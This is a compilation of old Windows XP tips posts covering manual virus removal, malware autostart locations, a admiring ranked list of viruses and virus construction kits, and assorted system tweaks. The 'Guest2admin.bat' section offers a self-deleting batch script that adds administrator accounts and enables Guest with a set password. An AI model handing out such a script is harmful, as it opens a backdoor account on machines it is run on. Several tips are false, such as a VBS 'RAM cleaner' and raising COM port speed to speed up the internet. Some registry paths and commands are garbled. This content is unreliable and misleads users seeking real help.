Manually Removing PC Viruses!

Manually Removing PC Viruses!

Have you ever been in the possition that you know you have an virus but you dont have any antivirus?? Its almost impossible to remove it manual without knowing about a few tips & tricks.

After reading this turtorial im sure you will know how to manual remove most of the virus lurking around. But that dosnt mean you shouldnt have any anti virus on you computer! Anyway, lets get starting with the turtorial.. I suppose you already know what safe mode is. If you dont try pressing the F8 key some times when you start your computer. You havto do this when your computer is about to start the first windows components. In win2k or xp i think you can press space and then F8 when it ask you if you want to go back to previous working setting.

Enough talk about how to start you computer in safe mode, but if you want to manual remove viruses you almost everytime haveto do this in safe mode becouse in safemode most viruses dosnt start. Only some few windows component is allowed to run in safemode. So here is what to do. Step:

1: Start your computer in safemode.

2: If you know where the virus are hiding delete the executable file.

3: Open the registry and go to the keys below and add an : in front of the value of the string that you think its the virus. Like this, if string is "virus" and its value is "c:\virus.exe" change its value to ":c:\virus.exe". The : is like comenting out the value. But if you are sure its the virus you can just delete the string. Here are the keys you maybe want to look at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce

NOTE-Firefox user might not able to view full path.For full path edit your text size smaller by pressing ctrl-.

4: The virus can start itself from some other places to. win.ini is the most common files that viruses can use. Soo you should find the files named win.ini and system.ini and look through them and see if you find anything.

5: Look through the startup folder that is normaly located in your profile directory \Start Menu\Programs\Startup.

6: Try searching for the virus executable to see if its hiding some other place.

7: Finally look through the list of services that windows is running. This list is often located under control panel - administrative tools - services. After this 7 steps just reboot your computer in normal mode and try to figure out if the virus is still there.. If not SUCCESS if yes, try to go back to safe mode and hunt some more. Off course this 7 steps will not work on every virus out there, but many of them.

Note:-
-Be carefull with the registery, dont mess it up, if u do ur computer is Gone , depends on wat u mess up, i suggest u made a system restore point first, so incase someting happens you can go back on it. -

The World's best Viruses

The World's best Viruses
1.W32.Bagle.AF
2.W32.Bagle.H
3.W32.Hiton.A
4.W32.MyDoom.F
5.W32.Netsky.Z
6.W32.Netsky.D
7.W32.Netsky.B
8.W32.Sober.F
9.W32.Sober.D
10.W32.Sober.C
11.W32.Sober
12.W32.Dumaru
13.W32.Sobig.F
14.W32.BugBear.B
15.W32.LovSan/Blaster1
16.W32.Sinapps
17.W32.Sunday
18.W32.Delta
19.W32.Gold
20.W32.Retro
21.W32.Koshi.1.9
22.Linux.ADM
23.Linux.Coco
24.W32.NBC
25.W32.Clickit
26.W32.Parasit
27.W32.PolySnakebyte
28.W32.RousSarcoma

29.W32.Hllw.Sydney@MM

30.CIH
31.I Love You
32.Melissa
33.w32nimda
34.Wagner 782
35.Casino
36.Harddrive-killer pro 5
37.Code red 1
38.Code red 2
39.Pokemon Pikachu
40.AIDS
41.hdfill
42.Blackday
43.Bulbasaur
44.Mirc.El_Che_is_alive
45.Kpmv.W2000.Poly
46.Mbop!
47.C-worm
48.Batschell
49.bat.antifa
50.Bat/BatXP.Iaafe
51.Bat\\bun
52.Bat.Bush
53.BAT.Dolomite.worm
54.bat.****
55.bat/hotcakes
56.bat.ina
57.bat.junkboat
58.bat.soulcontrol
59.BatXP.Saturn
60.BAT/Calvin&Hobbes
61.claytron
62.HoloCaust
63.p2p.Opax
64.PERL.Nirvana
65.VBS/Artillery
66.vbs.eva
67.VBS/Evade
68.Vbs.Evion
69.w32.merkur.c
70.W32/Outsider
71.W32/Outsider B
72.W32/Outsider C
73.W32/Outsider D
74.W32/Outsider E
75.W32/Perrun
76.W97/Blackout
77.W97M/Authority
78.W97M/Chester
79.W97M/SFC
80.WinREG.Sptohell
81.Virenpaket 0
82.Virenpaket 1
83.Virenpaket 2
84.Virenpaket 3
85.Virenpaket 4
86.Virenpaket 5
87.Virenpaket 6
88.Virenpaket 7
89.Virenpaket 8
90.Virenpaket 9
91.Virenpaket 10
92.Virenpaket 11
93.Zed\'s Word Macro Virus Constructor
94.Windows Scripting Host Worm Constructor 1.0
95.Special Format Generator 2.0

Places where viruses and trojan hide

1. START-UP FOLDER. W*NDOW$ opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu.
Notice that I did not say that W*NDOW$ "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference.
Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs.
For example, if you put a M*CRO$OFT Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.)
2. REGISTRY. W*NDOW$ executes all instructions in the "Run" section of the W*NDOW$ Registry. Items in the "Run" section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above.
3. REGISTRY. W*NDOW$ executes all instructions in the "RunServices" section of the Registry.
4. REGISTRY. W*NDOW$ executes all instructions in the "RunOnce" part of the Registry.
5. REGISTRY. W*NDOW$ executes instructions in the "RunServicesOnce" section of the Registry. (W*NDOW$ uses the two "RunOnce" sections to run programs a single time only, usually on the next bootup after a program installation.)[/color]7. REGISTRY. W*NDOW$ executes instructions in the HKEY_CLASSES_ROOTexefileshellopencommand "%1" %* section of the Registry. Any command imbedded here will open when any exe file is executed. Other possibilities:
[HKEY_CLASSES_ROOTexefileshellopencommand] =""%1" %*"[HKEY_CLASSES_ROOTcomfileshellopencommand] =""%1" %*"[HKEY_CLASSES_ROOTbatfileshellopencommand] =""%1" %*"[HKEY_CLASSES_ROOThtafileShellOpenCommand] =""%1" %*"[HKEY_CLASSES_ROOTpiffileshellopencommand] =""%1" %*"[HKEY_LOCAL_MACHINESoftwareCLASSESbatfileshellopenc ommand] =""%1"%*"[HKEY_LOCAL_MACHINESoftwareCLASSEScomfileshellopenc ommand] =""%1"%*"[HKEY_LOCAL_MACHINESoftwareCLASSESexefileshellopenc ommand] =""%1"%*"[HKEY_LOCAL_MACHINESoftwareCLASSEShtafileShellOpenC ommand] =""%1"%*"[HKEY_LOCAL_MACHINESoftwareCLASSESpiffileshellopenc ommand] =""%1"%*"
If keys don't have the ""%1" %*" value as shown, and are changed to something like ""somefilename.exe %1" %*" than they are automatically invoking the specified file.
8. BATCH FILE. W*NDOW$ executes all instructions in the Winstart batch file, located in the W*NDOW$ folder. (This file is unknown to nearly all W*NDOW$ users and most W*NDOW$ experts, and might not exist on your system. You can easily create it, however. Note that some versions of W*NDOW$ call the W*NDOW$ folder the "WinNT" folder.) The full filename is WINSTART.BAT.
9. INITIALIZATION FILE. W*NDOW$ executes instructions in the "RUN=" line in the WIN.INI file, located in the W*NDOW$ (or WinNT) folder.
10. INITIALIZATION FILE. W*NDOW$ executes instructions in the "LOAD=" line in the WIN.INI file, located in the W*NDOW$ (or WinNT) folder.
It also runs things in shell= in System.ini or c:W*NDOW$system.ini:
[boot]shell=explorer.exe C:W*NDOW$filename The file name following explorer.exe will start whenever W*NDOW$ starts.
As with Win.ini, file names might be preceeded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the W*NDOW$ directory
11. RELAUNCHING. W*NDOW$ reruns programs that were running when W*NDOW$ shut down. W*NDOW$ cannot do this with most non-M*CRO$OFT programs, but it will do it easily with Internet Explorer and with W*NDOW$ Explorer, the file-and-folder manager built into W*NDOW$. If you have Internet Explorer open when you shut W*NDOW$ down, W*NDOW$ will reopen IE with the same page open when you boot up again. (If this does not happen on your W*NDOW$ PC, someone has turned that feature off. Use Tweak UI, the free M*CRO$OFT W*NDOW$ user interface manager, to reactivate "Remember Explorer settings," or whatever it is called in your version of W*NDOW$.)
12. TASK SCHEDULER. W*NDOW$ executes autorun instructions in the W*NDOW$ Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all W*NDOW$ versions except the first version of W*NDOW$ 95, but is included in W*NDOW$ 95 if the M*CRO$OFT Plus Pack was installed.
13. SECONDARY INSTRUCTIONS. Programs that W*NDOW$ launches at startup are free to launch separate programs on their own. Technically, these are not programs that W*NDOW$ launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their "parent" programs run.
14. C:EXPLORER.EXE METHOD.
C:Explorer.exe W*NDOW$ loads explorer.exe (typically located in the W*NDOW$ directory)during the boot process. However, if c:explorer.exe exists, it will be executed instead of the W*NDOW$ explorer.exe. If c:explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot.
If c:explorer.exe is a trojan, it will be executed. Unlike all other autostart methods, there is no need for any file or registry changes - the file just simply has to be named c:explorer.exe
15. ADDITIONAL METHODS.
Additional autostart methods. The first two are used by Trojan SubSeven 2.2.
HKEY_LOCAL_MACHINESoftwareM*CRO$OFTActive SetupInstalled Components
HKEY_LOCAL_MACHINESoftwareM*CRO$OFTW*NDOW$Currentv ersionexplorerUsershell folders
Icq Inet[HKEY_CURRENT_USERSoftwareMirabilisICQAgentAppstest]"Path"="test.exe""Startup"="c:test""Parameters"="""Enable"="Yes"
[HKEY_CURRENT_USERSoftwareMirabilisICQAgentApps]This key specifies that all applications will be executed if ICQNET Detects an Internet Connection.
[HKEY_LOCAL_MACHINESoftwareCLASSESShellScrap] ="Scrap object""NeverShowExt"=""This key changes your file's specified extension

What is Virus-Trojan?

What is a trojan/worm/virus/logic bomb?

This FAQ answer was written by Theora:

Trojan: Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, its called a 'bug' or, in some cases, a feature :) Some virus scanning programs detect some trojans. Some virus scanning programs don't detect any trojans. No virus scanners detect all trojans. Virus: A virus is an independent program which reproduces itself. It may attach to other programs, it may create copies of itself (as in companion viruses). It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some virus scanners detect some viruses. No virus scanners detect all viruses. No virus scanner can protect against "any and all viruses, known and unknown, now and forevermore".Worm: Made famous by Robert Morris, Jr. , worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the systems. They are self contained and use the networks to spread, in much the same way viruses use files to spread. Some people say the solution to viruses and worms is to just not have any files or networks. They are probably correct. We would include computers. Logic Bomb: Code which will trigger a particular form of 'attack' when a designated condition is met. For instance, a logic bomb could delete all files on Dec. 5th. Unlike a virus, a logic bomb does not make copies of itself.

Windows XP hidden applications!

Windows XP hidden applications!

Run any of these applications: go to Start > Run and type the executable name (ie charmap).
Windows XP hidden apps: ====================
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of window$ clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
Micro$oft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) window$ Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )
13) Program Manager = progman.exe (Legacy window$ 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant). 15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the window$ Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).
17) File siganture verification tool = sigverif.exe
18)Cool Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).
21) Micro$oft Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).
23) window$ for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can use to control starup programs) 25) gpedit.msc used to manage group policies, and permissions..!

New Yahoo! Messenger Virus Attack

New Yahoo! Messenger Virus Attack, how to prevent?

This Yahoo messenger virus attack is one of the most powerful Trojan/virus..released in 10 November 2007. If your computer is infected with this virus; It will sends the nsl-school.org url to all of your friend list in yahoo messenger using your ID . So with in few hours many of your friends will get infected with it.
To solve this problem, Just go through the below steps carefully.
What are those links ?: Nsl-school.org or other (Do not open this url in your browser).
IPB Image
If you are infected with it what is going to happen ?
1: It sets your default IE page to nsl-school.org, you can't even change it back to other page. If you open IE from your comp some malicious code will automatically executed into your computer.
2: It will disables the Task manager / reg edit. So you can't kill the Trojan process anymore.
3: Files that are gonaa installed by this virus are svhost.exe , svhost32.exe , internat.exe. You can find these files in windows/ & temp/ directories.
4: It will sends the secured & protected information to attacker
How to remove this manually from your computer ?
1: Close the IE browser. Log out messenger / Remove Internet Cable.
2: To enable Regedit Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f
3: To enable task manager : (To kill the process we need to enable task manager)
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 0 /f
4: Now we need to change the default page of IE though regedit.
Start>Run>Regedit
From the below locations in Regedit chage your default home page to hackgyan.com or other
Code: HKEY_CURRENT_USERSOFTWAREMic*ftInternet ExplorerMain HKEY_ LOCAL_MACHINESOFTWAREMic*ftInternet ExplorerMain HKEY_USERSDefaultSoftwareMic*ftInternet ExplorerMain
Just replace the attacker site with hackgyan.com or set it to blank page.
5: Now we need to kill the process from back end. For this, Press "Ctrl + Alt + Del" Kill the process svhost32.exe . ( may be more than one process is running.. check properly)
6: Delete svhost32.exe , svhost.exe files from Windows/ & temp/ directories. Or just search for svhost in your comp.. delete those files.
7: Go to regedit search for svhost and delete all the results you get Code: Start>Run>Regedit
8: Restart the computer. That's it now your system is virus free.

How to remove win32nsanti virus

Download

Combofix:hxxp://download.bleepingcomputer.com/sUBs/Beta/ComboFix.exe and save to the desktop.

Or u can search and Download the Combofix.
Close all other browser windows.
go to start --> run and copy/paste in the following:
"%userprofile%\desktop\combofix.exe" /killall
When finished, it will produce a logfile located at C:\ComboFix.txt.
Note:Do not mouseclick combofix's window while it is running. That may cause your system to
stall/hang.

1.Get this version of Hijackthis from hxxp://danborg.org/spy/hjt/alternativ.exe
2.Save it in a permanent folder of your choice, such as C:\HJT\.

To create this specific folder on your hard drive: Double click the 'My Computer' icon on your desktop, then under the category hard disk drives: double click Local Disk:, then select file->New -> Folder and name it HJT3 Run hijackthis. (alternativ exe). Choose the "Do a system scan and save a log file" option to perform your scan.HijackThis will analyze your system, and automatically open a notepad textfile containing he HijackThis log when the scan is finished.Open the text files containing the logs with a text editor and click Edit -> Select All, followed by Edit -> Copy.From within the browser window and with the message body text box selected, click Edit -> Paste.
Post the contents of ComboFix.txt. in your next reply with a hijackthis log.

Windows Mobile

Windows Mobile is a compact operating system combined with a suite of basic applications for mobile devices based on the Microsoft Win32 API. Windows Mobile 6, formerly codenamed Crossbow, is the latest version of Windows Mobile platform and has been released on February 12, 2007 at the 3GSM World Congress 2007. It comes in three different versions: Windows Mobile 6 Standard for Smartphone, Windows Mobile 6 Professional for PDAs with phone functionality and Windows Mobile 6 Classic for plain PDAs without cellular radios. Windows Mobile 6, the next iteration of the Windows Mobile platform, brings new features and tools to Smartphone while still maintaining unrivaled flexibility, productivity and customization. Windows Mobile 6 also delivers a more powerful mobile communications experience to the user and genuine Outlook Mobile experience through rich HTML support. Windows Mobile 6 provides an increased level of productivity by helping users reach deeper into information available on their devices to places they can’t reach while at their desks. Windows Mobile 6 delivers increased device control and security, and greater operability with Exchange Server and other Microsoft assets so businesses can efficiently deploy, manage and help secure their mobile solutions.

Blu-ray-The Next-Generation Optical Disc

Blu-ray

Blu-ray, also known as Blu-ray Disc (BD), is the name of a next-generation optical disc format jointly developed by the Blu-ray Disc Association (BDA), a group of the world's leading consumer electronics, personal computer and media manufacturers (including Apple, Dell, Hitachi, HP, JVC, LG, Mitsubishi, Panasonic, Pioneer, Philips, Samsung, Sharp, Sony, TDK and Thomson). The format was developed to enable recording, rewriting and playback of high-definition video (HD), as well as storing large amounts of data. The format offers more than five times the storage capacity of traditional DVDs and can hold up to 25GB on a single-layer disc and 50GB on a dual-layer disc. This extra capacity combined with the use of advanced video and audio codec will offer consumers an unprecedented HD experience. While current optical disc technologies such as DVD, DVD±R, DVD±RW, and DVD-RAM rely on a red laser to read and write data, the new format uses a blue-violet laser instead, hence the name Blu-ray. Despite the different type of lasers used, Blu-ray products can easily be made backwards compatible with CDs and DVDs through the use of a BD/DVD/CD compatible optical pickup unit. The benefit of using a blue-violet laser (405nm) is that it has a shorter wavelength than a red laser (650nm), which makes it possible to focus the laser spot with even greater precision. This allows data to be packed more tightly and stored in less space, so it's possible to fit more data on the disc even though it's the same size as a CD/DVD. This together with the change of numerical aperture to 0.85 is what enables Blu-ray Discs to hold 25GB/50GB.Blu-ray is currently supported by more than 180 of the world's leading consumer electronics, personal computer, recording media, video game and music companies. The format also has broad support from the major movie studios as a successor to today's DVD format. In fact, seven of the eight major movie studios (Disney, Fox, Warner, Paramount, Sony, Lionsgate and MGM) have released movies in the Blu-ray format and five of them (Disney, Fox, Sony, Lionsgate and MGM) are releasing their movies exclusively in the Blu-ray format. Many studios have also announced that they will begin releasing new feature films on Blu-ray Disc day-and-date with DVD, as well as a continuous slate of catalog titles every month. The name Blu-ray Disc is derived from the blue-violet laser used to read and write this type of disc. Because of its shorter wavelength (405 nm), substantially more data can be stored on a Blu-ray Disc than on the DVD format, which uses a red (650 nm) laser. A single layer Blu-ray Disc can store 25 gigabytes (GB), over five times the size of a single layer DVD at 4.7 GB. A dual layer Blu-ray Disc can store 50 GB, almost 6 times the size of a dual layer DVD at 8.5 GB.Blu-ray Disc is similar to PDD, another optical disc format developed by Sony (which has been available since 2004) but offering higher data transfer speeds. PDD was not intended for home video use and was aimed at business data archiving and backup.

Increse Your PC Speed by cleaning Your RAM

Increse Your PC Speed by cleaning Your RAM
Clean your RAM by notepad!!!

Clean RAM & Make Your Comp Speed Better...

You may recognize that ur system gets slower and slower when playing and working a lot with your pc. That's Because your RAM is full of remaining progress pieces u do not need any more.
So create a new text file on ur desktop and call it .. "RAMcleaner" or something...
1. Open NotePad

2. write FreeMem=Space(128000000)

3. Save it with RAMcleaner.vbs (You may choose the "All Files" option when u save it).

4. Just press double click the file and you done it.

Note: Don't wait for any perticular program. By double clicking you found a flash on your screen and that's it. And you feel that your speed is incerased....

You can adjust the size of the free ram according to your ram capacity

Convert a Guest account into an Admin

Convert a Guest account into an Admin?

All you need to do is copy the code below,

copy/paste it into Notepad and save it as Guest2admin.bat on your desktop.

echo off

title Please wait...

cls

net user add Username Password /add

net user localgroup Administrators Username /add

net user Guest 420 /active:yes

net localgroup Guests Guest /DELETE

net localgroup Administrators Guest /add

del %0

Double-click the file to execute or type the above-given code in Command Prompt.

Note: this also creates a net account which is also accessable through nets open

port (basically it’s a security leak).

Changing doc file to pdf using Google Docs

Changing doc file to pdf using Google Docs?

Changing doc file to pdf using Google Docs!
Yes, this is true, you can change a doc file to pdf using Google Docs.
What you need to do is

1. Upload your file to Google Docs.

2. Open the document, and now just go to file on the left hand top side of your document.

3. Click file and then click export as pdf.

4. Save the file in pdf, and your file is now saved as pdf file and is now converted.

THE END

How to Auto DELETE temporary folder

How to Auto DELETE temporary folder ?

For Beginers

what we used to prefer is, type "%temp% " {without quotes} in Start -> Run.This opens your temporary folder and then you can erase it easily, but still try dis one
too..

For Advance User

First go into gpedit.mscNext select -> Computer Configuration/Administrative Templates/Windows Components/Terminal
Services/Temporary FolderThen right click "Do Not Delete Temp Folder Upon Exit"Go to properties and hit disable. Now next time Windows puts a temp file in that folder it
will automatically delete it when its done!
Note : GPEDIT (Group Policy Editor) is only available in XP Pro.

Increase Your Internet speed

Increase Your Internet speed
Follow the step:-Go to desktop->My computer-(right click on)->properties->then go HARDWARE tab->Device
manager-> now u see a window of Device managerthen go to Ports->Communication Port(double click on it and Open).after open u can see a Communication Port properties.go the Port Setting:----and now increase ur "Bits per second" to 128000.and "Flow control" change 2 Hardware.
apply and see the result

BOOST up your ACROBAT READER

BOOST up your ACROBAT READER {almost like NOTEPAD}
1. Go to the installation folder of acrobat reader directory(C:\program files\adobe\acrobat\reader\.. )
2. Move all the files and folders from the "plugins" directory to the "Optional" directory.
(I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you
to move the files).
Now your acrobat reader will load very fast.Almost as good as notepad.

Speed up BOOSTing by disabling unused ports

You may have tried many tweaks like modifying windowsXP start-up applications, prefetches, unload DLLs method,etc. And yes those methods do work for me.I have just accidentally found out another way to give you an extra boost in windowsXP's boot performance. This is done by disabling your unused devices inDevice Manager. for example, if you don't have input devices that are connected to one of your USBs or COM ports, disabling them will give you an extra perfromance boost in booting. Go to Control Panel -> System -> Hardware tab -> device manager Disable devices that you don't use for your PC and then restart.

How to Remove Windows XP's Messenger ?

How to Remove Windows XP's Messenger ?
Theoretically, you can get rid of it (as well as a few other things). Windows 2000 power users should already be familiar with this tweak.
Fire up the Windows Explorer and navigate your way to the %SYSTEMROOT% \ INF folder. What the heck is that thingy with the percentage signs? It's a variable. For most people, %SYSTEMROOT% is

C:\Windows. For others, it may be

E:\WinXP. Get it? Okay, on with the hack!

In the INF folder, open sysoc.inf (but not before making a BACKUP copy first). Before your eyes glaze over, look for the line containing "msmsgs" in it. Near the end of that particular line, you'll notice that the word "hide" is not so hidden. Go ahead and delete "hide" (so that the flanking commas are left sitting next to one another). Save the file and close it.

Now, open the Add and Remove Programs applet in the Control Panel. Click the Add / Remove Windows Components icon. You should see "Windows Messenger" in that list. Remove the checkmark from its box, and you should be set.

NOTE: there are other hidden system components in that sysoc.inf file, too. Remove "hide" and the subsequent programs at your own risk.

Convert FAT to NTFS file system Easily

Convert FAT to NTFS file system Easily:-
To convert a FAT partition to NTFS, perform the following steps.
Click Start>>click Programs>> and then click Command Prompt.
In Windows XP, click Start>> click Run>> type cmd or Command and then click OK.
At the command prompt,

type CONVERT [driveletter]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.

NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).

Trick to Upgrade Windows 98 or Windows Millennium Edition Profiles to Windows XP Domain User Profiles

Trick to Upgrade Windows 98 or Windows Millennium Edition Profiles to Windows XP Domain User Profiles
This guide describes how to upgrade a Microsoft Microsoft Windows 98-based, or Microsoft Windows Millennium Edition-based client that has user profiles to a Microsoft Windows XP-based client.
The following steps enable the Windows 98 and Windows Millennium Edition (Me) profiles to be retained throughout the process.Your best method to retain the profiles is to join the domain during the upgrade installation process.Otherwise, you must use a workaround method to transfer the profile information over to the Windows XP profile.
During the upgrade installation process, at the networking section, the administrator is offered the choice to join a domain or a workgroup.If you join the domain at this juncture, you ensure that all the existing profiles are migrated successfully to the Windows XP-based installation.
If you did not join the computer to the domain during the upgrade process, you must use the following workaround method:
Join the upgraded computer to the target domain.All applicable users must log on and log off (which generates a profile).Copy the appropriate Application Data folder from the Windows 95, Windows 98, and Windows Me profiles to the newly created user profiles.

Tricks To Set The Search Screen To Classic Look

Tricks to set the search screen to Classic Look
When I first saw the default search pane in Windows XP, my instinct was to return it to its classic look; that puppy had to go. Of course, I later discovered that a doggie door is built into the applet. Click "Change preferences" then "Without an animated screen character." If you'd rather give it a bare-bones "Windows 2000" look and feel, fire up your Registry editor and navigate to:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ CabinetState.
You may need to create a new string value labeled "Use Search Asst" and set it to "no".

Thats all You Are Done.

How to speed up MENU display

How to speed up MENU display
When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly. Start Regedit(Go to run and type "regedit" and press return ). Navigate to HKEY_CURRENT_USER\Control Panel\DesktopSelect MenuShowDelay from the list on the right.

Right on it and select Modify.

Change the value to 0.

Reboot your computer.

Run Line Command

Run Line Command
These are GUI applications that can be opened from the run line.These applications are not located in the C:\windows\system32\ directory, thekeys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
1.BCKGZM.EXE - Backgammon
2.CHKRZM.EXE - Checkers
3.CONF.EXE - NetMeeting
4.DIALER.EXE - Phone Dialer
5.HELPCTR.EXE - Help and Support
6.HRTZZM.EXE - Internet Hearts
7.HYPERTRM.EXE - HyperTerminal
8.ICWCONN1.EXE - Internet Connection Wizard
9.IEXPLORE.EXE - Internet Explorer
10.INETWIZ.EXE - Setup Your Internet Connection
11.INSTALL.EXE - User's Folder
12.MIGWIZ.EXE - File and Settings Transfer Wizard
13.MOVIEMK.EXE - Windows Movie Maker
14.MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
15.MSCONFIG.EXE - System Configuration Utility
16.MSIMN.EXE - Outlook Express
17.MSINFO32.EXE - System Information
18.MSMSGS.EXE - Windows Messenger
19.MSN6.EXE - MSN Explorer
20.PBRUSH.EXE - Paint
21.PINBALL.EXE - Pinball
22.RVSEZM.EXE - Reversi
23.SHVLZM.EXE - Spades
24.TABLE30.EXE - User's Folder
25.WAB.EXE - Windows Address Book
26.WABMIG.EXE - Address Book Import Tool
27.WINNT32.EXE - User's Folder
28.WMPLAYER.EXE - Windows Media Player
29.WRITE.EXE - Wordpad
30.ACCWIZ.EXE - Accessibility Wizard
31.CALC.EXE - Calculator
32.CHARMAP.EXE - Character Map
33.CLEANMGR.EXE - Disk Space Cleanup Manager
34.CLICONFG.EXE - SQL Client Configuration
35.CLIPBRD.EXE - Clipbook Viewer
36.CLSPACK.EXE - Class Package Export Tool
37.CMD.EXE - Command Line
38.CMSTP.EXE - Connection Manager Profile Installer
39.CONTROL.EXE - Control Panel
40.DCOMCNFG.EXE - Component Services
41.DDESHARE.EXE - DDE Share
42.DRWATSON.EXE - Doctor Watson v1.00b
43.DRWTSN32.EXE - Doctor Watson Settings
44.DVDPLAY.EXE - DVD Player
45.DXDIAG.EXE - DirectX Diagnostics
46.EUDCEDIT.EXE - Private Character Editor
47.EVENTVWR.EXE - Event Viewer
48.EXPLORER.EXE - Windows Explorer
49.FREECELL.EXE - Free Cell
50.FXSCLNT.EXE - Fax Console
51.FXSCOVER.EXE - Fax Cover Page Editor
52.FXSEND.EXE - MS Fax Send Note Utility
53.IEXPRESS.EXE - IExpress 2.0
54.LOGOFF.EXE - System Logoff
55.MAGNIFY.EXE - Microsoft Magnifier
56.MMC.EXE - Microsoft Management Console
57.MOBSYNC.EXE - Microsoft Synchronization Manager
58.MPLAY32.EXE - Windows Media Player version 5.1
59.MSHEARTS.EXE - Hearts
60.MSPAINT.EXE - Paint
61.MSTSC.EXE - Remote Desktop Connection
62.NARRATOR.EXE - Microsoft Narrator
63.NETSETUP.EXE - Network Setup Wizard
64.NOTEPAD.EXE - Notepad
65.NSLOOKUP.EXE - NSLookup Application
66.NTSD.EXE - Symbolic Debugger for Windows 2000
67.ODBCAD32.EXE - ODBC Data Source Administrator
68.OSK.EXE - On Screen Keyboard
69.OSUNINST.EXE - Windows Uninstall Utility
70.PACKAGER.EXE - Object Packager
71.PERFMON.EXE - Performance Monitor
72.PROGMAN.EXE - Program Manager
73.RASPHONE.EXE - Remote Access Phonebook
74.REGEDIT.EXE - Registry Editor
75.REGEDT32.EXE - Registry Editor
76.RESET.EXE - Resets Session
77.RSTRUI.EXE - System Restore
78.RTCSHARE.EXE - RTC Application Sharing
79.SFC.EXE - System File Checker
80.SHRPUBW.EXE - Create Shared Folder
81.SHUTDOWN.EXE - System Shutdown
82.SIGVERIF.EXE - File Signature Verification
83.SNDREC32.EXE - Sound Recorder
84.SNDVOL32.EXE - Sound Volume
85.SOL.EXE - Solitaire
86.SPIDER.EXE - Spider Solitaire
87.SYNCAPP.EXE - Create A Briefcase
88.SYSEDIT.EXE - System Configuration Editor
89.SYSKEY.EXE - SAM Lock Tool
90.TASKMGR.EXE - Task Manager
91.TELNET.EXE - MS Telnet Client
92.TSSHUTDN.EXE - System Shutdown
93.TOURSTART.EXE - Windows Tour Launcher
94.UTILMAN.EXE - System Utility Manager
95.USERINIT.EXE - My Documents
96.VERIFIER.EXE - Driver Verifier Manager
97.WIAACMGR.EXE - Scanner and Camera Wizard
98.WINCHAT.EXE - Windows for Workgroups Chat
99.WINHELP.EXE - Windows Help Engine
100.WINHLP32.EXE - Help
101.WINMINE.EXE - Minesweeper
102.WINVER.EXE - Windows Version Information
